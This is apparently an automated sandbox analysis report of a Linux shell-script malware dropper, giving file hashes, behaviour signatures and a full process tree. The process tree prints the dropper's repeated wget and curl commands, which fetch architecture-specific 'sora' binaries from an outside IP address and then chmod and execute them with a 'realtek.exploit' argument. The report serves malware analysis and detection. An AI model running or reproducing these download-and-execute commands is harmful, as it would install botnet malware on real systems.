Analysis
-
max time kernel
10s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18/10/2024, 02:36
Static task
static1
Behavioral task
behavioral1
Sample
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
-
Size
2KB
-
MD5
2a963ff4fb99086ab454f4f26acf8b74
-
SHA1
0830412185a29f4230a85d8f6eb4d15f2a165aea
-
SHA256
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1
-
SHA512
7317b366deb9f38c93b54f2b7e877c2b33bb864f26e49d356446c16292f76fcf7005c5ff4540e8551f5c80c13e5964137d9f545744ce309a24016733244f01d1
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1561 chmod 1579 chmod 1522 chmod 1537 chmod 1597 chmod 1603 chmod 1531 chmod 1573 chmod 1585 chmod 1591 chmod 1543 chmod 1549 chmod 1555 chmod 1567 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 1523 robben /tmp/robben 1532 robben /tmp/robben 1538 robben /tmp/robben 1544 robben /tmp/robben 1550 robben /tmp/robben 1556 robben /tmp/robben 1562 robben /tmp/robben 1568 robben /tmp/robben 1574 robben /tmp/robben 1580 robben /tmp/robben 1586 robben /tmp/robben 1592 robben /tmp/robben 1598 robben /tmp/robben 1604 robben -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1525 wget 1529 curl 1530 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Processes
-
/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh1⤵
- Writes file to tmp directory
PID:1518 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:1519
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵PID:1520
-
-
/bin/catcat sora.x862⤵PID:1521
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya2⤵
- File and Directory Permissions Modification
PID:1522
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:1523
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:1525
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:1529
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:1530
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya2⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:1532
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:1534
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵PID:1535
-
-
/bin/catcat sora.x86_642⤵PID:1536
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya2⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:1538
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:1540
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵PID:1541
-
-
/bin/catcat sora.i4682⤵PID:1542
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya2⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:1544
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:1546
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵PID:1547
-
-
/bin/catcat sora.i6862⤵PID:1548
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya2⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:1550
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:1552
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵PID:1553
-
-
/bin/catcat sora.mpsl2⤵PID:1554
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya2⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:1556
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:1558
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵PID:1559
-
-
/bin/catcat sora.arm42⤵PID:1560
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya2⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:1562
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:1564
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵PID:1565
-
-
/bin/catcat sora.arm52⤵PID:1566
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya2⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:1568
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:1570
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵PID:1571
-
-
/bin/catcat sora.arm62⤵PID:1572
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya2⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:1574
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:1576
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵PID:1577
-
-
/bin/catcat sora.arm72⤵PID:1578
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya2⤵
- File and Directory Permissions Modification
PID:1579
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:1580
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:1582
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵PID:1583
-
-
/bin/catcat sora.ppc2⤵PID:1584
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya2⤵
- File and Directory Permissions Modification
PID:1585
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:1586
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:1588
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵PID:1589
-
-
/bin/catcat sora.ppc440fp2⤵PID:1590
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya2⤵
- File and Directory Permissions Modification
PID:1591
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:1592
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:1594
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵PID:1595
-
-
/bin/catcat sora.m68k2⤵PID:1596
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya2⤵
- File and Directory Permissions Modification
PID:1597
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:1598
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:1600
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵PID:1601
-
-
/bin/catcat sora.sh42⤵PID:1602
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya2⤵
- File and Directory Permissions Modification
PID:1603
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:1604
-